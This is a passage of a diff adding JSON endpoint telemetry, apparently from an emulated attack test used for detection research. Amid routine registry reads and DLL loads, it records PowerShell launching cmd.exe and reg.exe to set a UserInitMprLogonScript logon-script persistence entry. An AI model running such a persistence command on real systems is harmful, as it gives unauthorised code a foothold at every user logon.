"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wwapi.dll", + "image_path": "C:\\Windows\\System32\\wwapi.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573251360000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573251509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4436, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573253050000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573252920000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573252920000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4436, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}" + }, + { + "command_line": "REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6488, + "ppid": 4436, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883573253160000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}", + "unique_ppid": "{42FC7E13-CBCD-5C05-0000-0010B0B25401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883573253080000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "registry", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Environment", + "registry_value": "Environment", + "timestamp": 131883573253230000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-0010A6B35401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883573279020000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573279020000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "SVCHOST.EXE-CD4ED1A8.pf", + "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-CD4ED1A8.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573351680000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REG.EXE-26976709.pf", + "file_path": "C:\\Windows\\Prefetch\\REG.EXE-26976709.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573354020000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573415119984, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573415270000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 6488, + "process_name": "reg.exe", + "process_path": "C:\\WINDOWS\\system32\\reg.exe", + 